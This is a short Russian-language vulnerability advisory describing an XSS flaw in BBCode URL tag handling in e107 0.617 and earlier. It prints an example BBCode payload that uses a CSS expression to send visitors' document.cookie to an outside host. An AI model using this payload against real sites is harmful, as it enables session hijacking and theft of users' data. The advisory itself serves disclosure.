Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: e107 0.617 и более ранние версии
Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
получить доступ к потенциально важным
данным других пользователей. Уязвимость
существует при обработке BBCode URL тегов.
Удаленный пользователь может с помощью
специально сформированного запроса
выполнить произвольный HTML сценарий в
браузере жертвы в контексте безопасности
уязвимого сайта.
Пример:
[color=#EFEFEF][url]www.ut[url=
http://www.s=''style='font-size:0;color:#EFEFEF' style='top:expression(eval(this.sss));
'sss=`i=new/**/Image(); i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;
this.sss=null`style='font-size:0;][/url][/url]'[/color]